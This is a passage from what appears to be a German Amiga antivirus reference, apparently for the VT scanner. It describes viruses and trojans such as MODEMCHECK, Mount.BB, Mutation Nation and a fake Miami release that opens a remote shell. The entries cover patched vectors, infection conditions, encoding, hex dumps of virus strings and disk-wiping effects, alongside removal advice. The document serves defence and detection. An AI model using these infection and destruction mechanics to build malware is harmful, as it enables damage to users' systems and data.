  1781.          Cold, DoIo, OldOpenLib,  im Prg. noch Cool
  1782.          Im BB und im verseuchten File ist zu lesen:
  1783.          -METAMORPHOSIS V1.0- the next Generation from LAMER-EXTERMINATOR !
  1784.          Schaeden:
  1785.          Sobald der Wert in der Zaehlzelle groesser als $14 ist,
  1786.          Kopfstep alle Laufwerke.
  1787.          NeuBoot dieser Disk ergibt bei mir einen Requester:
  1788.          Volume has a read/write error    (Tracks defekt) nicht mehr
  1789.          viel zu retten.
  1790.          Vermehrung:
  1791.          mit DoIo = BB
  1792.          mit OldOpenLib = Link an File als 1.Hunk
  1793.          Linkbedingungen:
  1794.          - sucht c:           (bei mir NUR da, steht auch so im Prg.)
  1795.          - und dann mit examine, exnext usw Files
  1796.          - kein Schreibschutz
  1797.          - File ausfuehrbar  $3F3
  1798.          - File kleiner #40000
  1799.          - File noch nicht befallen
  1800.  
  1801.          Fuer die Hunk-Bestimmung nimmt das VirusPrg. die IRQ-Methode.
  1802.          Befallene Files sind lauffaehig .
  1803.          Verlaengert ein File um 1060 Bytes.
  1804.          KEIN Eintrag in startup-sequence .
  1805.          Keine Textmeldung des VirusPrg's .
  1806.  
  1807.          Ausbau mit VT getestet: 11.04.92
  1808.  
  1809.          Hinweis: Da alle Files in c: verseucht sein koennen, sollten
  1810.             Sie ueberlegen, ob es nicht schneller ist, alle Files neu
  1811.             von c einer OrigWB-Disk zu kopieren. Dann brauchen Sie mit
  1812.             VT nur noch aus Files den Link-Hunk auszubauen, die auf
  1813.             der Orig-WB-Disk NICHT vorhanden waren.
  1814.  
  1815.    - MEXX     SCA-Clone
  1816.       Text:          Hello there...
  1817.                      Here I'm again...
  1818.                      I've infected ya Disx !
  1819.                      I'm a simple VIRUS
  1820.                      and I came from a group called
  1821.                       --- MEXX ---
  1822.                       Yeah, reset now !!!
  1823.                      Or I will infect more!
  1824.  
  1825.    - MGM89     anderer Name: MEGAMASTER   s.o.
  1826.  
  1827.    - MG's Virus V1.0 (BB)  auch mit KS2.04, aber NICHT mit 68030
  1828.          KickTag, KickCheckSum, SumKickData, GetMes, BeginIo
  1829.          AddIntSer (5 = Vert. Beam)
  1830.          Codiert mit   not.w (a1)+
  1831.          Decodiert im Speicher zu lesen: MG's Virus V1.0
  1832.          Meldet sich nicht.
  1833.          Taeuscht sauberen Bootblock vor bei verbogenen Vektoren
  1834.          Vermehrung bei:
  1835.           - Lesen oder schreiben Block 0
  1836.           - Format Disk
  1837.  
  1838.    - Miami.21g Fake
  1839.          Filename: Miami.020  Laenge: 407596 Bytes
  1840.          Archivname: DC-MI21G.lha
  1841.          nach FileID:
  1842.                   .________________
  1843.               ____¦____  (   _____/__  - -------------
  1844.             _/     ___/ _/\_  T     ¬\_ ·  diGiTAL   ·
  1845.           .-\     ¦/    7--7  l       / · cORRUPTiON ·
  1846.           |  \____.-----¦  ¦----.____/------- -  -   -
  1847.           |   ¯¯¯¯¯             ¯¯¯¯¯
  1848.           |    Miami 2.1g - MUI based TCP/IP stack
  1849.           |    Cracked executables with fake keys!
  1850.           |
  1851.           `-[15/09/97]-------------------------[ 7eN ]
  1852.         Aber auf der Miami-Homepage war zu lesen:
  1853.         <p>Note: The current version 2.1g is identical to 2.1f
  1854.         except for a new version of MiamiRegister. If you are
  1855.         currently using 2.1f and have already registered then you
  1856.         do <em>not</em> need to download 2.1g.</p>
  1857.         Also gab es KEINE 2.1g-Version ?????
  1858.         Aktuell war im Nov. 97 die 2.1p-Version
  1859.         Die Gefahr duerfte also nur noch gering sein.
  1860.         Filevergleich:
  1861.             2.1g-Fake                   2.1f-Orig
  1862.          64617920 73747265 day stre : 64617974 696d6520 daytime
  1863.          616d2074 63702064 am tcp d : 73747265 616d2074 stream t
  1864.          6f732062 696e2061 os bin a : 6370206e 6f776169 cp nowai
  1865.          206e6577 636c6920  newcli  : 7420726f 6f742069 t root i
  1866.          7463703a 37373000 tcp:770. : 6e746572 6e616c00 nternal.
  1867.          64617974 696d6520 daytime  : 64617974 696d6520 daytime
  1868.                ;.....
  1869.          49002456 45523a20 I.$VER:  : 49002456 45523a20 I.$VER:
  1870.          4d69616d 6920322e Miami 2. : 4d69616d 6920322e Miami 2.
  1871.          31672028 31352e30 1g (15.0 : 31662028 33312e30 1f (31.0
  1872.          392e3937 29004e6f 9.97).No : 382e3937 29004e6f 8.97).No
  1873.                ;.....
  1874.          73656c65 63740000 select.. : 73656c65 63740000 select..
  1875.          594f2f0c 2f4e0004 YO/./N.. : 2f0c49f9 00008000 /.I.....
  1876.          49f90000 80002f08 I...../. : 2f086100 fee8584f /.a...XO
  1877.                ;usw....
  1878.         Schaden:  (Fremdaussage)
  1879.         Ok guyz so this is supposed to be a dC release
  1880.         of Miami 2.1g...cept those guyz didn't do it
  1881.         What it IS however is a totally pathetic attempt
  1882.         to release a fake in order to gain access to machines it
  1883.         is run on.
  1884.         The concept is that some sucker runs this crap and
  1885.         then n e 1 can telnet or letnet to their port 13 and all
  1886.         going to plan the remote sys will get a juicy shell prompt
  1887.         to steal various goodies like Miami.default etc :)
  1888.         Now for the funny bit...this is so poorly done its
  1889.         the work of a braindead simpleton, and I'm not even sure
  1890.         that it works because of the implementation as there are
  1891.         a few things it relies on...yes thats right, it still
  1892.         needs some help :)
  1893.         - You must MANUALLY configure this version in
  1894.           Miami.
  1895.         - Importing previous settings or using MiamiInit
  1896.           stuffs up their plan (Methinks).
  1897.         - A rudimentary Miami Firewall screws it totally.
  1898.         - You have to be stupid enuff not to notice the
  1899.           CLI bit in the database settings
  1900.         Is all the above likey...hahaha....NO!
  1901.         So in summary...thanx to the guyz that did this, it made
  1902.         my somewhat boring and miserable day...I laughed for ages!
  1903.                           - Later RaMoNsTeR :)
  1904.        Ich hoffe es gibt diese Version wirklich nicht im Original
  1905.        (siehe oben), sonst koennte es zu Fehlerkennungen kommen.
  1906.        VT bietet Loeschen an.
  1907.  
  1908.  
  1909.    - MicroSystems  BB   FastMem ja  nur KS1.2
  1910.       holt selbst Namen aus ROM (z.B. dos.library)
  1911.       Cool und Cold
  1912.       im Prg. bei Bedarf: AddTask, RemTask und DoIo
  1913.       Vermehrung: ueber BB
  1914.       Textausgabe ueber Graphikroutine
  1915.       unverschluesselt steht im BB:
  1916.       YOUR AMIGA IS INFECTED BY
  1917.       A NEW GENERATION OF VIRUS
  1918.       CREATED IN SWEDEN BY
  1919.       MICROSYSTEMS
  1920.  
  1921.    - MicroSystems-CBM  BB   Clone  s.o.
  1922.       nur Text geaendert.
  1923.            79726967 68746564 20627920 62696720 yrighted by big
  1924.            205d830c 436f6d6d 6f646f72 65204147  ]..Commodore AG
  1925.  
  1926.  
  1927.    - Micro-Master  ( noch ein SCA! )
  1928.  
  1929.  
  1930.    - Minus-Hunklaenge    (Fehlermeldung)
  1931.        VT glaubt beim Filetest ein File gefunden zu haben, das an der
  1932.        Stelle $14 den Wert $FFFFwxyz enthaelt. Nach meiner Meinung er-
  1933.        geben die vier F eine negative Hunklaenge und das ist nicht
  1934.        moeglich. Das File duerfte so unbrauchbar sein (ausprobieren).
  1935.        Entstehung:
  1936.        Moeglicherweise bei einem frueheren Virusausbau
  1937.        Abhilfe:
  1938.        Suchen Sie nach $3E9 (Hunkcode) und schreiben Sie das Langwort,
  1939.        das danach folgt, auch nach $14. Mit etwas Glueck ist das File
  1940.        danach wieder brauchbar.
  1941.  
  1942.  
  1943.    - MODEMCHECK-Virus    File
  1944.               Installprogramm   Laenge CrunchMania gepackt: 15516 Bytes
  1945.                                 Laenge ungepackt          : 22252 Bytes
  1946.               Virusprogramm loadwb  Laenge: 3604 Bytes
  1947.        Installablauf:
  1948.          Es werden angeblich verschiedene Modemleitungen getestet und
  1949.          die Ergebnisse in der Shell ausgegeben. Aber auch ohne Modem
  1950.          wurden bei mir alle Leitungen mit OK ausgegeben. In Wirklich-
  1951.          keit wird c/loadwb kopiert. Ein mitlaufendes Snoopdos-Programm
  1952.          wird abgeschaltet.
  1953.        Zerstoerungsablauf:
  1954.          Nach einem Reset muss loadwb neu geladen werden. Der loadwb-
  1955.          Befehl wird ausgefuehrt, wenn eine KS 36 oder hoeher vorliegt.
  1956.          Ausserdem wird IMMER ein Prozess Diskdriver.proc gestartet.
  1957.          Mit KS1.3 ist also nach diesem Befehl keine Arbeit auf der WB
  1958.          moeglich, wodurch jeder Benutzer gewarnt sein sollte.
  1959.          Bevor die Zerstoerung beginnt, werden noch einige Tests durchge-
  1960.          fuehrt:
  1961.            - ein Speicherbereich wird mit eori.b #$8E,d0 decodiert.
  1962.              Es ergibt sich S:HORSE
  1963.              Es wird nun versucht dieses File zu oeffnen. Falls ja,
  1964.              dann Programmende. Also wahrscheinlich ein Schutz fuer
  1965.              den Programmierer.
  1966.            - Ueber DosEnvec Test ob
  1967.                - mehr als 22 Sektoren >$16=#22=21+1¸
  1968.                - oder mehr als 90 Zylinder HighCyl>$5a =#90=89+1
  1969.                - oder mehr als 2 Koepfe
  1970.              falls nicht mindestens eine Bedingung erfuellt ist Abbruch
  1971.          Das Virusteil hat bei mir NIE sofort mit der Zerstoerung be-
  1972.          gonnen . DosDelay = $7530 = 10 Minuten
  1973.          Durch die Zerstoerungsroutine werden die Bloecke mit FUCK
  1974.          aufgefuellt. s.u.
  1975.          Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur
  1976.          Format.
  1977.            lZ 0 Bl 0
  1978.              00: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK
  1979.              10: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK
  1980.              20: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK
  1981.               usw.
  1982.          Hinweis: Der Rigid-Bereich war nicht betroffen, da dieser Be-
  1983.           reich mit DosEnvec nicht erreicht werden kann.
  1984.            pZyl 0 Bl      0  RDSK-Bl ChS: ok
  1985.              00: 5244534b 00000040 af6aa877 00000007 RDSK...@.j.w....
  1986.              10: 00000200 0000003a ffffffff 00000001 .......:........
  1987.              20: 00000002 ffffffff ffffffff ffffffff ................
  1988.              30: ffffffff ffffffff ffffffff ffffffff ................
  1989.              40: 000004fb 00000022 00000002 00000001 ......."........
  1990.              50: fffffffe 00000000 00000000 00000000 ................
  1991.              60: 00000000 00000000 00000000 00000000 ................
  1992.              70: 00000000 00000000 00000000 00000000 ................
  1993.              80: 00000000 00000043 00000001 000004fa .......C........
  1994.              90: 00000044 00000000 00000034 00000000 ...D.......4....
  1995.              a0: 53795175 65737420 53513535 35202020 SyQuest SQ555
  1996.              b0: 20202020 20202020 46354520 47565000         F5E GVP.
  1997.              c0: 00000000 47565053 43534928 23312129 ....GVPSCSI(#1!)
  1998.              d0: 00000000 414c4c00 00000000 00000000 ....ALL.........
  1999.               usw.
  2000.          Hinweis 2: VT versucht den Prozess abzuschalten. Da Prozesse
  2001.          im Amiga nur schwer abzuschalten sind, KANN es zu einem Ab-
  2002.          sturz kommen, MUSS aber nicht. Ich habe es 10x ohne Absturz
  2003.          geschafft, den AKTIVEN Prozess zu entfernen.
  2004.          Hinweis 3: Bitte vergessen Sie nicht, den Original-LoadWB-Be-
  2005.          fehl neu aufzuspielen, da VT nur loeschen fuer das Virusteil
  2006.          anbietet.
  2007.          Hinweis Feb 94:
  2008.            Es sind einige File mit dem Namen loader o. loadwb und der
  2009.            Laenge 3604 Bytes aufgetaucht. Aus der Laenge ist schon ab-
  2010.            zusehen, dass es sich um eine Umbenennung des loadwb-Virus-
  2011.            teils handelt. Ausserdem wurden einige Texte im File geaen-
  2012.            dert. MUESSEN von VT als Virus erkannt werden !!
  2013.          Zerstoerung loader Typ B:   (DiskSalv 3.01 Loader ???)
  2014.            lZ 0 Bl 0
  2015.              00: 444c5420 444c5420 444c5420 444c5420 DLT DLT DLT DLT
  2016.              10: 444c5420 444c5420 444c5420 444c5420 DLT DLT DLT DLT
  2017.          Zerstoerung loader Typ C:
  2018.            lZ 0 Bl 0
  2019.              00: 20544149 20544149 20544149 20544149  TAI TAI TAI TAI
  2020.              10: 20544149 20544149 20544149 20544149  TAI TAI TAI TAI
  2021.          Zerstoerung loader Typ D:
  2022.            lZ 0 Bl 0
  2023.              00: 4c414d45 4c414d45 4c414d45 4c414d45 LAMELAMELAMELAME
  2024.              10: 4c414d45 4c414d45 4c414d45 4c414d45 LAMELAMELAMELAME
  2025.            Es ist leider KEINE Rettung moeglich.
  2026.          Hinweis 5:  vgl. auch  666!-Trojan
  2027.  
  2028.    - Mongo09-BBS   Einbruchswerkzeug in BBS
  2029.          siehe bei ZonderKommando 1  (Name nachvollziehbar)
  2030.  
  2031.    - Mongo51-BBS   Einbruchswerkzeug in BBS
  2032.          siehe bei ZonderKommando 2  (Name nicht nachvollziehbar)
  2033.  
  2034.    - Morbid Angel   Forpib-Clone   s.o.
  2035.          nur sichtbarer Text und einige unwichtige Bytes wurden
  2036.          geaendert.
  2037.  
  2038.    - MOSH.1.0-BB-Virus  anderer moeglicher Name: SILESIAN-BB-Virus
  2039.          Bitte NICHT mit anderen MOSH-BBen verwechseln !!!!
  2040.          Fordert trackdisk.device NICHT .
  2041.          KS2.04: ja
  2042.          Im Speicher immer ab $7F800
  2043.          Belegt Speicher NICHT mit allocmem. Folge: Andere Programme
  2044.          (z.B. VT) koennen das Virusteil ueberschreiben. Dann stehen
  2045.          UNMOEGLICHE Werte in DoIo usw. . Ein GURU droht.
  2046.          Verbogen: DoIo, KickTag, KickCheckSum
  2047.          Mehrfach decodiert mit  eori.b xy,(a1)+  ist zu lesen:
  2048.            61727900 14a50a20 48455920 21202049 ary.... HEY !  I
  2049.            604d2020 4d4f5348 20766572 73696f6e `M  MOSH version
  2050.            20312e30 004628c8 19464952 53542053  1.0.F(..FIRST S
  2051.            494c4553 49414e20 56495255 53004632 ILESIAN VIRUS.F2
  2052.            b9285772 69747465 6e206279 20746865 .(Written by the
  2053.            20626573 74204d2e 472e0046 3c783253  best M.G..F<x2S
  2054.            70656369 616c2067 72656574 696e6773 pecial greetings
  2055.            20746f3a 20432e49 2e412e20 616e6420  to: C.I.A. and
  2056.            4b2e4741 524c454a 00464664 3c426969 K.GARLEJ.FFd<Bii
  2057.            69672066 75636b69 6e672074 6f3a204b ig fucking to: K
  2058.            415a494f 20535445 494e484f 46462061 AZIO STEINHOFF a
  2059.            6e642044 2e4b2e42 49540000 414e4420 nd D.K.BIT..AND
  2060.            6e6f7720 53455249 4f555320 49204c4f now SERIOUS I LO
  2061.            56452042 45415441 2042206d 79204245 VE BEATA B my BE
  2062.            53542067 69726c20 46726965 6e642068 ST girl Friend h
  2063.            61766520 796f7520 41494453 203f2069 ave you AIDS ? i
  2064.            66206861 76652069 74206669 6e652069 f have it fine i
  2065.            206f6c73 6f206861 7665206f 6e650007  olso have one..
  2066.          Vermehrung: BB
  2067.          Textausgabe: DisplayAlert (HEY..)
  2068.          Schaeden in Abhaengigkeit von einer Zaehlzelle (#5):
  2069.           a) Schreibt BB-Virus
  2070.           b) Schreibt nach $6E000 (nur bei DD-Disk Rootblock)
  2071.              Text. Versuchen Sie mit DiskSalve zu retten, was
  2072.              noch zu retten ist.
  2073.            414e4420 6e6f7720 53455249 4f555320 AND now SERIOUS
  2074.            49204c4f 56452042 45415441 2042206d I LOVE BEATA B m
  2075.              usw.
  2076.           c) Zerstoert Block ab $2800 (Bl20+0=Bl21). Ein File das
  2077.              diesen Block verwendet, ist NICHT zu retten. Es handelt
  2078.              sich hierbei um ein codiertes Textteil.
  2079.                   pZyl 0  Bl 20
  2080.            beb1bbdf 919088df acbaadb6 b0aaacdf ................
  2081.            b6dfb3b0 a9badfbd babeabbe dfbddf92 ................
  2082.            86dfbdba acabdf98 968d93df b98d969a ................
  2083.  
  2084.  
  2085.    - MOSH1-BB     Cool, nach Reset auch $68 immer ab $7C000
  2086.          soll Virusdemo sein (so ein Schwachsinn)
  2087.          keine Vermehrung, codiert mit MOSH, eor.l d0,(a0)+
  2088.          ueber $68 und in Abhaengigkeit von Zaehlzelle (Cmpi.l #$190,(a0))
  2089.          Textausgabe ueber Graphikroutine:
  2090.          schwarzer Hintergrund, Gelbe Schrift
  2091.             MAFIA PLK  usw
  2092.          da Endlosschleife Reset notwendig
  2093.          dringende Empfehlung: loeschen
  2094.  
  2095.    - MOSH2-BB s.o keine Vermehrung
  2096.       KS2.04: nach Reset Absturz
  2097.       Zusaetzlich nach reset oldopenlib verbogen und ueber displayAlert
  2098.       Textausgabe: Hey you old lame   usw.
  2099.       Da keine Vermehrungsroutine eigentlich kein Virus
  2100.       Dringende Empfehlung: sofort loeschen
  2101.  
  2102.  
  2103.    - Mount-972-Virus   siehe bei B.E.O.L.-LVirus
  2104.  
  2105.  
  2106.    - Mount.BB-Virus    BB   1024 Bytes
  2107.        Fundort z.B.: CD-LSD1:A/Leisure/MultitaskingGames/cheatModeC.DMS
  2108.                      (1.Ausgabe)
  2109.        Fordert trackdisk.device NICHT
  2110.        Cool, DoIo, SumKickData
  2111.        KS2.04 mit 68030: Ja
  2112.        Speicherlage: $7F400 oder $FE000 (wird mit #$4e70 getestet)
  2113.        Im BB ist zu lesen:
  2114.            4cdf7fff 6000fe5a 01432f4d 6f756e74 L..`..Z.C/Mount
  2115.            0000432f 44000000 00000000 00000000 ..C/D...........
  2116.                    ;.......
  2117.            4e75646f 732e6c69 62726172 79005359 Nudos.library.SY
  2118.            533a432f 44000000 00000000 00000000 S:C/D...........
  2119.        Schaeden:
  2120.         - es wurde ein Lese-Zugriff mit DoIo versucht:
  2121.            - schreibt Virus-BB.
  2122.         - es wurde ein Schreib-Zugriff mit DoIo versucht:
  2123.            Test #$1111,$F80000 (gefunden=Abbruch)
  2124.            Test #$99,$320 (nicht gefunden=Abbruch)
  2125.            - versucht in C/Mount (Laenge 208 Bytes) anzulegen.
  2126.            - versucht in C/D (Laenge 1024 Bytes = Virus-BB) anzulegen.
  2127.          Diese Vorgehensweise ist neu !!
  2128.      Hinweis:
  2129.        Fehlerquelle  Stand: Anfang April 94
  2130.        Bei aktivem Mount.BB-Virus im Speicher erkennen einige Antivirus-
  2131.        programme "Gremlins-Virus" und versuchen die Original-Vektoren
  2132.        wieder zu setzen. Da die Vektorensicherung beim Mount.BB-Virus
  2133.        an einer anderen Stelle stattfindet, verursachen diese Prg.e
  2134.        einen Systemabsturz.
  2135.        Ich nehme an, dass der Fehler in den entsprechenden Programmen
  2136.        beim naechsten Update (Mai 94 ?) behoben wird.
  2137.      Hinweis:
  2138.        Dieser BB wird auch als ELENI-BB-Virus gefuehrt. Bitte
  2139.        verwechseln Sie den BB nicht mit dem ELENI-Clock-BB-Virus.
  2140.        Im BB des Mount.BB-Virus ist auch zu lesen:
  2141.            464d464f 4a20584a 53565420 56322e32 FMFOJ XJSVT V2.2
  2142.        Wenn Sie nun #1 von den Bytes abziehen, ergibt sich:
  2143.            454c454e 49205749 52555320 56322e32 ELENI WIRUS V2.2
  2144.        Im dt. Alphabet kommt halt vor X W und nicht V.
  2145.  
  2146.    - Mount.BB-Inst1    File    Laenge: 66424 Bytes
  2147.        An ein gepacktes XCopy wurde mit der 4EB9-4EF9-Methode ein Virus-
  2148.        teil gelinkt.
  2149.        Diese Teil wird beim Aufruf von XCopy im Speicher installiert
  2150.        und aktiviert.
  2151.        VT bietet Ausbau an. Das verbleibende XCopy ist gepackt.
  2152.        Ob dieses XCopy (XCopy 4.93) echt ist, kann ich nicht beurteilen.
  2153.        Das Datum laesst auf eine ueberholte Version schliessen. Da Sie
  2154.        sowieso keine Raubkopie verwenden, besorgen Sie sich bitte die
  2155.        neueste Version bei der Vertreiberfirma.
  2156.  
  2157.    - Mount.BB-Inst2
  2158.        Zwei Files in C
  2159.         - Mount Laenge: 208 Bytes
  2160.         - D     Laenge: 1024 Bytes  (BB-Virus-Data)
  2161.        VT sucht nach Mount und bietet Loeschen an. Falls VT Mount findet,
  2162.        wird ohne Rueckfrage auch nach dem File D gesucht, und bei Bedarf
  2163.        geloescht. Bitte spielen Sie danach von der Orig-WB-Disk den
  2164.        mount-Befehl neu auf.
  2165.        ABER ein Problem bei AKTIVEM Virusteil !!!!!!!!!!!!
  2166.        Das Programm "vergisst" einen Lock freizugeben. VT meldet beim
  2167.        Filetest Objekt in use . Das Teil kann also dann so nicht geloescht
  2168.        werden.
  2169.        Schnelle Abhilfe:
  2170.        Setzen Sie mit VT die Original-Vektoren.
  2171.        Booten Sie dann von einer SAUBEREN Diskette neu. Ein Booten von
  2172.        der Festplatte ist NICHT sinnvoll, da dann ja der Mount-Befehl
  2173.        aufgerufen wuerde. Loeschen Sie dann mit VT die beiden Files in c .
  2174.        Dieses Virusteil zeigt, dass es sinnvoll ist, den Rigid-BB oder den
  2175.        Rigid-Zylinder der Festplatte ab und zu auf eine leere Disk zu
  2176.        sichern. Dann ist im Schadensfall ein Zurueckspielen moeglich und
  2177.        ein Format Festplatte kann wahrscheinlich vermieden werden.
  2178.        Schadensverlauf:
  2179.        Fast in jeder startup-sequence wird der mount-Befehl aufgerufen.
  2180.         - Dieser falsche Mount-Befehl versucht nun SYS:C/D (=BB-Virus-Data)
  2181.           nach $7F000 in den Speicher zu laden.
  2182.         - Sprung nach $7F00C
  2183.         - Kopieren des Virus-BB nach $7F400 oder $FE000
  2184.         - Verbiegen der Vektoren
  2185.         - usw.
  2186.        Die frueher vorhandenen Mount-Anweisungen werden von dem Virusteil
  2187.        (nur 208 Bytes) NICHT ausgefuehrt !!!
  2188.  
  2189.  
  2190.    - mount-Virus   Laenge: 1072   KEINE verbogenen Vektoren
  2191.       reines Zerstoerungsprogramm  KS1.3: NEIN  GURU 3  KS2.04: JA
  2192.       laeuft aber unter KS2.04 mit ORIG-Mount-Befehl von KS1.3 .
  2193.       Guru-Fehler liegt im VirusPrg.
  2194.       Von der Definition KEIN Virus, da keine Vermehrung.
  2195.       Namensbegruendung: im File ist am Anfang zu lesen
  2196.                                           633A               c:
  2197.            6D6F756E 74000000 00000000 00000000 mount...........
  2198.       Liegt in c: als mount Laenge 1072
  2199.       Braucht in c:why . Wird von mount-Virus aufgerufen. Der why-
  2200.       Befehl ist ein umbenannter Original-Mount-Befehl. Die Version
  2201.       des Original-Mount-Befehls spielt keine Rolle. (wurde getestet)
  2202.       Den why-Befehl gibt es unter KS2.04 NICHT mehr in c: !!!!
  2203.       Ablauf:
  2204.       In jeder s-seq ist wahrscheinlich der mount-Befehl enthalten.
  2205.         mount aux   usw.
  2206.       Das Virus-Mount-Prg. wird also gestartet.
  2207.       Das VirusPrg. sucht sich selbst (c:mount) und ueberprueft ob die
  2208.       Zaehlzelle im Prg. schon den Wert #20 erreicht hat. Wenn nein,
  2209.       wird der Zaehler um 1 erhoeht und zurueckgeschrieben (open, seek,
  2210.       read, write, close). KEINE Gefahr !!!
  2211.       Wenn ja : Zaehlerzelle = #20
  2212.       Aufruf von c:why  (= Orig.-mount) mit execute
  2213.       Suche in Liste nach DH    (also keine Zerstoerung von df0: usw.)
  2214.       Info besorgen, Blockanzahl besorgen, allocmem leer Blocklaenge,
  2215.       Mit DoIo ueber Schleife jeden Block leer neu schreiben.
  2216.       Wenn fertig Motor aus. Suche in Liste naechstes DH .
  2217.       Sie koennen so ihre Festplatten ohne Probleme unbrauchbar machen.
  2218.                           Tests wurden durchgefuehrt mit df0:
  2219.       gemountet als DH0: . Erfolg siehe oben
  2220.  
  2221.       Fileerkennung getestet mit VT : 28.09.92
  2222.       Empfehlung: mount und why einfach loeschen und neu aufkopieren.
  2223.  
  2224.       Nachtrag 06.01.93: Ein User hat das Install-Programm gefunden.
  2225.       siehe bei SMBX-Mount Virus
  2226.  
  2227.    - Mount-2-Trojan  File in s  Clone   Laenge: 784 Bytes
  2228.        Rest siehe oben bei Aibon2-Mount2-Clone
  2229.  
  2230.    - MsgTop V1.0   siehe oben Devil_11_B.Door
  2231.          Laenge gepackt: 13548   VT erkennt Imploder
  2232.          Laenge einmal entpackt: 17884  VT erkennt Devil_11
  2233.  
  2234.    - MST-VEC Virus  File    s.o. CLP-Virus Clone2 oder DOOR BELLS
  2235.  
  2236.    - MST-Inte Virus  File   s.o. CLP-Virus Clone2
  2237.  
  2238.    
  2239.    - muTAgeN1 ??      Codierteil
  2240.          Es ist ein Teil aufgetaucht, mit dem jeder Virus codiert wer-
  2241.          den kann. Ein Decodierheader mit VARIABLER Laenge wird danach
  2242.          vor das jetzt codierte Virusteil gehaengt.
  2243.          VT versucht (!?!?) den Decodierheader bei Filetest zu finden.
  2244.          Es koennte zu Fehlerkennungen kommen !!!!!!
  2245.          Ich waere Ihnen dankbar wenn Sie diese Files etwas genauer
  2246.          untersuchen UND/ODER an einen Antivirusprogrammierer weiter-
  2247.          leiten wuerden. Danke
  2248.          Im Codierteil (nicht im DecodierHeader) ist zu lesen:
  2249.             303cfd84 4eb60000 5b6d7554 4167654e 0<..N...[muTAgeN
  2250.             315d0000                            1]..
  2251.  
  2252.  
  2253.    - Mutation-Nation-Virus    Link  
  2254.        Mind. KS 37
  2255.        Nicht Resetfest
  2256.        Fileverlaengerung: 1316 Bytes
  2257.        Verbogene Vektoren: Loadseg, FindTask
  2258.        Ueberlaeuft 3E8-, 3F0- und 3F1-Hunks
  2259.        Haengt sich hinter ersten Hunk.
  2260.        Starke Aehnlichkeit im Grundgeruest mit Ebola
  2261.        Mehrfach codiert
  2262.        Verwendet LEA mit ungerader Adresse
  2263.        Codierbyte wird mit SDFF006 geaendert.
  2264.        Fuer die Codierung wird in Abhaengigkeit von $DFF007 D0-D5 und
  2265.        A0-A5 verwendet.
  2266.        Im mehrfach mehrfach decodierten Linkteil ist zu lesen:
  2267.                      4e754475 70650000 536e6f6f     NuDupe..Snoo
  2268.             70446f73 20537570 706f7274 2050726f pDos Support Pro
  2269.             63657373 0000536e 6f6f7044 6f730000 cess..SnoopDos..
  2270.             2d3d2a20 4d757461 74696f6e 204e6174 -=* Mutation Nat
  2271.             696f6e20 56312e30 20627920 41495a20 ion V1.0 by AIZ
  2272.             2a3d2d00 00000003                   *=-.....
  2273.              ;....
  2274.             4ef900f8 274a0000 DEADC0DE 000003f2 N...'J..........
  2275.        Speichereinbau:  
  2276.        Zuerst Test auf SnoopDos (falls ja, nicht im Speicher ein-
  2277.        haengen).
  2278.        Test auf Dupe (Schutz fuer den Programmierer ????)
  2279.        Test ob Loadseg schon von Ebola verbogen (vergessen zu aendern
  2280.        oder nicht begriffen ??)
  2281.        Verbogener Loadseg-Vektor dient der Verseuchung.
  2282.        Verbogener Findtask-Vektor dient dem Programmierer wahrschein-
  2283.        lich als Selbstschutz.
  2284.        Linkablauf: 
  2285.        Test auf Disk Val.
  2286.        Mind. 5 Bloecke frei
  2287.        File groesser #2000 und kleiner #300000 Bytes   
  2288.        Test auf $DEADC0DE  (schon verseucht s.o. eine 0 nicht O) 
  2289.        Filename enthaelt nicht "." oder "-". UND uebernaechster Buch-
  2290.        stabe ( 2(a0) ) ist nicht a, e, n .
  2291.        Suche nach $4EAE    ( jsr -xy(Lib-Base) )
  2292.                            ( xy ist variabel )
  2293.        Falls gefunden, Test ob Abstand zu Hunkende kleiner $7FFE.
  2294.        $4EAE wird in $4EBA  ( jsr Hunkende(PC) ) geaendert.
  2295.        Neu: !!!
  2296.        Schreibt Original-Comment
  2297.        Setzt Original-Protection-Bytes
  2298.        Schreibt Original-FileDate
  2299.        Wenn Sie also in VT-Prefs zeige FileDate und Protection-Bytes
  2300.        anschalten beim Filetest, koennen Sie leider keinen Unterschied
  2301.        mehr feststellen. Bei Filelaenge natuerlich schon, aber wer hat
  2302.        die im Kopf. Einzige Moeglichkeit waere hier mit VT ein LogFile
  2303.        mit allen Filelaengen von wichtigen Unterverzeichnissen anlegen
  2304.        zu lassen.
  2305.        Aber !!!!
  2306.        Wenn man vor einiger Zeit mit VT Pruefsummen berechnet haette,
  2307.        waere JEDES einzelne verseuchte File beim Filetest mit Pruef-
  2308.        summe SOFORT aufgefallen !!!! Aber wer denkt schon an Vorsorge-
  2309.        massnahmen, wenn alles laeuft (der Schutz von einigen dirs z.B.
  2310.        c, devs, l, libs usw. ).
  2311.        Weitere Schaeden:
  2312.        Sobald die Systemzeit den Wert $1A39  (19. Mai 1996) und
  2313.        eine Zaehlzelle den Wert $14 erreichen, erfolgt ein move.l $0,$4 .
  2314.  
  2315.  
  2316.    - MUTILATOR-Virus   BB
  2317.       Namensbegruendung: siehe unten
  2318.       Fordert trackdisk.device NICHT
  2319.       Im Speicher immer ab $7CAD0
  2320.       Verbogene Vektoren: Cool, DoIo
  2321.       Decodiert mit eori.b #$27,(a1)+ steht im Speicher:
  2322.            00000000 00aa0c54 48495320 49532054 .......THIS IS T
  2323.            4845204e 4557204d 5554494c 41544f52 HE NEW MUTILATOR
  2324.            2d564952 55532021 000100d2 14425920 -VIRUS !.....BY
  2325.            4d415820 4f462053 5441524c 49474854 MAX OF STARLIGHT
  2326.            00000000 00005468 616e7820 746f2054 ......Thanx to T
  2327.            68652045 78656375 746f7273 20666f72 he Executors for
  2328.            20537072 65616469 6e672074 68697320  Spreading this
  2329.            47524541 5420636f 64652021 20646f6e GREAT code ! don
  2330.            653a202d 20313939 32202d20 00000000 e: - 1992 - ....
  2331.        Vermehrung: BB
  2332.           Vermehrung mit DoIo ist nur moeglich, wenn Speicher ab
  2333.           $C000000 vorhanden ist !!!!
  2334.        Schaeden:
  2335.           Sobald eine Zaehlzelle den Wert $e0 und eine andere den
  2336.           Wert 3 erreicht hat, Textausgabe (s.o.)
  2337.  
  2338.    - MVK   17.11.92  FileVirus   Laenge: 1052 Bytes  wird weitergegeben
  2339.       als MVK.lzh  Laenge: 1171 Bytes
  2340.  
  2341.       Namensbegruendung: aus Readme.file in Archiv Laenge: 469 Bytes
  2342.  
